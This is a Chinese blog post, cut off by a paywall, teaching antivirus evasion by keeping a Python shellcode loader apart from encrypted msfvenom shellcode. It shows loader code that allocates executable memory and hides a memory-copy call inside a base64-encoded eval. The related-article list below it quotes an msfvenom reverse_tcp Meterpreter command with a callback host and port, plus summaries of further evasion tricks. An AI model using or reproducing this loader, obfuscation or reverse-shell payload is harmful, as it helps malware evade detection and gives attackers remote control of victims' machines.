【免杀】分离免杀(python)

原创 已于 2023-06-28 21:04:16 修改 · 875 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #开发语言 #网络安全

于 2023-06-28 21:02:25 首次发布
文章讲述了如何使用Python编写shellcode加载器,通过加密shellcode和loader,然后分别存储到不同的文件中。shellcode使用msfvenom生成,loader则包含创建内存空间、解密shellcode并执行的逻辑。加密部分使用了base64和b32encode。最后,通过pyinstaller或py2exe将程序打包成可执行文件(exe),以便在Windows环境中运行。尽管打包后的程序在某些反病毒软件中可能被误报为恶意软件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

原理

shellcode是一段用于利用软件漏洞的有效负载代码,以其经常让攻击者获得shell而得名
shellcode loader加载器是用来运行shellcode的加载器,用什么语言来写都可以

思路就是将shellcode和loader分离开来,用loader加载存在于普通文件中的shellcode

实现

先将loader和shellcode都加密
loader

def shellCodeLoad(shellcode):
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="
最低0.47元/天 解锁文章

200万优质内容无限畅学
木马代码之python反序列化分离
04-15 1288
Cryptography是python语言中非常著名的加解密库,在算法层面提供了高层次的抽象,使用起来非常简单、直观,同时还保留了各种不同算法的低级别接口,保留灵活性我们知道加密一般分为对称加密(Symmetric Key Encryption)和非对称加密(Asymmetric Key Encryption)。各自对应多种不同的算法,每种算法又有不同的密钥位长要求,另外还涉及到不同的分组加密模式,以及末尾补齐方式。
Shellcode分离加载术:把“秘密”藏在更远的地方
最新发布
仇辉攻防的博客
05-17 621
本文围绕 Shellcode 分离加载的核心思路,系统介绍本地文件、参数注入、远程请求等多种分阶段加载技术,并结合安全测试场景进行实践验证,帮助提升在合法演练中的抗检测能力。
Python-shellcode分离
m0_63917373的博客
06-01 2948
shellcode
Python木马分离(下载分离型)
lunito的博客
04-27 1234
msf生成pythonshellcode木马简单分离思路
python打包的exe如何_通过Python实现Payload分离过程详解
weixin_39862899的博客
11-26 512
缺点:编译成exe以后体积过大实现:msf生成shellcode代码:将payload给copy下来,去除引号。\x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42\x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33\x49\x6f\x44\x37\x64\x4b...
python 生成payload_利用Python进行Payload分离
weixin_29300241的博客
02-09 325
缺点:编译成exe以后体积过大实现:msf生成shellcode代码:msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=192.168.3.60 LPORT=3333 -f c将payload给copy下来,去除引号。\x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\...
通过Python实现Payload分离过程详解
09-16
### 通过Python实现Payload分离过程详解 在网络安全领域,Payload分离技术是一种常见的方法,用于提高恶意软件的隐蔽性和生存能力。本文旨在详细介绍如何利用Python实现Payload的分离,通过具体示例帮助...
2024年Python最新【分离python)_shellcode loader
2401_84585462的博客
05-01 632
import sysf.close()loader加密。
python反序列化-分离1
08-03
在本文中,我们将深入探讨如何利用 Python 反序列化进行技术,特别是“分离”策略。 技术的主要目标是让恶意代码避开安全软件的检测,从而在目标系统上成功执行。常见的方法包括修改特征码、使用花...
CobaltStrike木马代码篇之python反序列化分离()
xf555er的博客
11-21 2031
本篇文章主要用到python来对CobaltStrike生成的Shellcode进行分离处理, 因此要求读者要有一定的python基础, 下面我会介绍pyhon反序列化所需用到的相关函数和库
Python
土豆的博客
08-03 2601
Somethingu have to know: 本Python脚本构建简易的http请求及响应,可通过服务端调用客户端CMD执行命令(可在客户端内置便捷指令 )。 同时,脚本使用了PyInstaller,将python解释器及第三方模块进行打包成可执行文件。 经测试可绝大多数软。 0x01 环境准备 pip install requests(用于发送请求) pip install pyscreenshot...
python
weixin_43152809的博客
07-13 793
最近学习的过程中,发现python的匿名函数很适合用于python中,除了一般使用def定义的函数外,还有一种使用lambda定义的匿名函数。这种函数可以用在任何普通函数可以使用的地方,但在定义时被严格限定为单一表达式。从语义上讲,它只是普通函数的语法糖。 我的理解,匿名函数就是另外一个函数的隐含调用 下方func处无论是什么内容,都会返回system这个字符串 如果把执行内容换成whoami 如下方代码段所示: 运行就可以获取whoami信息...
对抗—python&分离&无文件落地&图片隐写&SOCK管道
2301_76227305的博客
10-10 1648
今天主要是这个分离,其实思路是很不错的,至于脚本那些,可以自己改进,或者说换个其他的语言来实现。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
Python shellcode
qq_25761407的博客
04-02 5862
Python shellcode
Payload 实现分离
热门推荐
优快云
08-10 1万+
众所周知,目前的毒软件的毒原理主要有三种方式,一种基于特征,一种基于行为,一种基于云查,其中云查的一些特点基本上也可以概括为特征码查,不管是哪一种毒软件,都会检查PE文件头,尤其是当程序越大时,越容易被查
python 生成payload_通过Python实现Payload分离过程详解
weixin_35133280的博客
01-14 317
缺点:编译成exe以后体积过大实现:msf生成shellcode代码:将payload给copy下来,去除引号。\x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42\x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33\x49\x6f\x44\x37\x64\x4b...
【渗透测试笔记】之【Python——两行代码。VT查率:10/68(思路:将ShellCodeLoader一起分离)】
AA8j的博客
10-24 6145
文章目录1. shellcode Loader1.1 生成shellcode1.2 shellcode loader 脚本上线测试1.3 使用pyinstaller生成exe文件上线测试1.4 VT查率:24/682. ShellCode 分离2.1 上传加密后的shellcode2.2 改写shellcode loader2.3 shellcode 分离shellcode loader脚本上线测试2.4 shellcode 分离后,使用pyinstaller生成exe文件上线测试2.5 VT查率:1
python
09-11
Python是指在编写Python恶意代码时,通过一系列技术手段绕过毒软件的检测和阻止。在进行Python时,可以采取多种常用的静态技术,如特征码定位修改、填充花指令、文件加壳、内存执行、shellcode混淆、shellcodeloader分离、木马资源修改和调用系统白名单等。这些技术可以帮助我们在编写Python恶意代码时避毒软件检测到。 其中,特征码定位修改是指通过修改代码中的特征码或者特征码的位置,使得毒软件无法识别恶意代码。填充花指令是在代码中插入一些无实际功能的指令,以混淆代码结构,增加毒软件的分析难度。文件加壳是将恶意代码嵌入到其他可信的文件中,以绕过毒软件的检测。内存执行是将恶意代码直接加载到内存中执行,避了被毒软件静态检测的可能。shellcode混淆是通过对shellcode进行变形或加密,使其难以被毒软件识别。shellcodeloader分离是将shellcode和加载器分离,使得毒软件难以检测到完整的恶意代码。木马资源修改是通过修改恶意代码所依赖的资源文件或者库文件,绕过毒软件的检测。调用系统白名单是指利用操作系统的合法功能或者系统自带的程序来执行恶意代码,使其被认为是正常行为而不被毒软件拦截。 需要注意的是,不同语言shellcodeloader效果上有所差异,而Python中的效果相对较好。此外,选择小众语言和不同的exe打包器也可以提高效果。同时,在编写Python恶意代码时,尽量避使用敏感词汇,以降低被毒软件查的概率。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值